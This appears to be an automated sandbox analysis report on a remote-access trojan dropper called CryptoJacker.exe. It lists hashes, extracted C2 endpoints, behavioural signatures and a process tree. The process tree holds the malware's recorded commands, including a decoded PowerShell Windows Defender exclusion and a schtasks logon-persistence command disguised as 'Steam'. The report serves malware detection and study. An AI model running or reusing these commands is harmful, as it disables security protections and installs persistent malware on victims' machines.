Analysis
- max time kernel: 150s
- max time network: 138s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 01-07-2024 13:07
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: CryptoJacker.exe
  Resource: win7-20240508-en
- Behavioral task: behavioral2
  Sample: CryptoJacker.exe
  Resource: win10v2004-20240508-en
General
- Target: CryptoJacker.exe
- Size: 10.6MB
- MD5: d8a30735aa4702e200ed432d223c3ad8
- SHA1: fa144148c226a9d08e1d1179cfa60597d4f08cac
- SHA256: 24aeb855ead570407cef3835b4e5ac516e9ec8dd1d0105662727e4f12082b3d2
- SHA512: cbc030dd159172c2448554393caeb8b0c910d302dec1edc3a719c47be01bb90a4c243d1d15f0cbfebaf0e016cebec7e5c173c4d5cdd27ffdb557716f2071014a
- SSDEEP: 196608:g0Kn9PL3A8tKCn4bwcfAjSNgeQ4ZhseG0j73cQIqW3yiFoNWpPm4Q:/KnZQ4n4Z5Ve0PJIf3rFXdm4Q
Malware Config
Extracted: asyncrat
- Venom RAT + HVNC + Stealer + Grabber v6.0.3
- Default
- C2 endpoints:
  10.0.2.15:9090
  10.0.2.15:52033
  147.185.221.19:9090
  147.185.221.19:52033
- yigdzohbebyxyvvzbc
- delay: 1
- install: true
- install_file: Steam.exe
- install_folder: %AppData%
Signatures
- Async RAT payload (1 IoC)
  Processes:
    resource: \Users\Admin\AppData\Local\Temp\Main.exe    yara_rule: family_asyncrat
- Executes dropped EXE (4 IoCs)
  Processes:
    pid 2968  crypto_jacker.exe
    pid 2600  Main.exe
    pid 2644  crypto_jacker.exe
    pid 1956  Steam.exe
- Loads dropped DLL (5 IoCs)
  Processes:
    pid 1932  CryptoJacker.exe
    pid 2564  (process name not recorded in the report)
    pid 1932  CryptoJacker.exe
    pid 2968  crypto_jacker.exe
    pid 2644  crypto_jacker.exe
- Detects Pyinstaller (1 IoC)
  Processes:
    resource: \Users\Admin\AppData\Local\Temp\crypto_jacker.exe    yara_rule: pyinstaller
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid 1032  timeout.exe
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated entries collapsed)
  Processes:
    pid 2184  powershell.exe  (1 entry)
    pid 2600  Main.exe        (5 entries)
    pid 1956  Steam.exe       (remaining 58 entries)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    Token: SeDebugPrivilege  pid 2184  powershell.exe
    Token: SeDebugPrivilege  pid 2600  Main.exe
    Token: SeDebugPrivilege  pid 1956  Steam.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    pid 1956  Steam.exe
- Suspicious use of WriteProcessMemory (30 IoCs; repeated entries collapsed, counts in parentheses)
  Processes (source pid / process -> target pid / process):
    1932 CryptoJacker.exe  -> 2184 powershell.exe     (4)
    1932 CryptoJacker.exe  -> 2968 crypto_jacker.exe  (4)
    1932 CryptoJacker.exe  -> 2600 Main.exe           (4)
    2968 crypto_jacker.exe -> 2644 crypto_jacker.exe  (3)
    2600 Main.exe          -> 2572 cmd.exe            (3)
    2600 Main.exe          -> 1988 cmd.exe            (3)
    1988 cmd.exe           -> 1032 timeout.exe        (3)
    2572 cmd.exe           -> 1976 schtasks.exe       (3)
    1988 cmd.exe           -> 1956 Steam.exe          (3)
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree; each entry lists the image path, the recorded command line and the signatures hit)
- C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAcgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAbQB6ACMAPgA="
    (the -EncodedCommand argument is base64 of UTF-16LE text and decodes to: <#cpq#>Add-MpPreference <#rkg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#irt#> -Force <#vmz#> ; that is, a Windows Defender scan exclusion for the whole user profile and system drive, padded with junk block comments)
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
      - Executes dropped EXE
      - Loads dropped DLL
  - C:\Users\Admin\AppData\Local\Temp\Main.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Main.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
        - Scheduled Task/Job: Scheduled Task
    - C:\Windows\system32\cmd.exe
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.bat""
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\timeout.exe
        command line: timeout 3
        - Delays execution with timeout.exe
      - C:\Users\Admin\AppData\Roaming\Steam.exe
        command line: "C:\Users\Admin\AppData\Roaming\Steam.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dll
  Filesize: 5.5MB
  MD5: e2bd5ae53427f193b42d64b8e9bf1943
  SHA1: 7c317aad8e2b24c08d3b8b3fba16dd537411727f
  SHA256: c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400
  SHA512: ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036
- C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.bat
  Filesize: 149B
  MD5: 1a5c4a8386b3596e72460dc52b408da9
  SHA1: c385dcc0c2d0ff777d8361a6cfad24942645dbbb
  SHA256: 15fcaee33b841888872824ad5e0e45381f7d0231d17247f3293aaf8f56ec8f6e
  SHA512: 781b6ffe15cd44d69c466b815e933331edc31eded149d647eaabeac4a2c33ec8be30009793d45306c9ae04be9dc11afa046a1e825514aa2d03d40f801a533b45
- C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
  Filesize: 8B
  MD5: cf759e4c5f14fe3eec41b87ed756cea8
  SHA1: c27c796bb3c2fac929359563676f4ba1ffada1f5
  SHA256: c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
  SHA512: c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
- \Users\Admin\AppData\Local\Temp\Main.exe
  Filesize: 74KB
  MD5: b8ccfc163e2d56a73b6fd7387a45e6eb
  SHA1: f81a368c275574fa808a92d29c5e0b37e01162ce
  SHA256: 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
  SHA512: 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf
- \Users\Admin\AppData\Local\Temp\crypto_jacker.exe
  Filesize: 10.5MB
  MD5: ccb8c058314c049211a16c6291182261
  SHA1: f47c9a4cb2b48e5ede2d4a4bd934c2cd98cd9b90
  SHA256: 30da0a0cf38714ea7b3c3f1b6c30f810912e7cae78a053511ba1b3e03c9b6499
  SHA512: c878cf36309e91450791a6e4e0c3163b1226bbfcb6fdcdb3d421f228ed5c65771d3982f7f6ca24d5946f41aed5447de446f80fd92abeee6231d79f4860c76c71
- memory/1956-88-0x0000000001190000-0x00000000011A8000-memory.dmp
  Filesize: 96KB
- memory/2600-36-0x0000000001210000-0x0000000001228000-memory.dmp
  Filesize: 96KB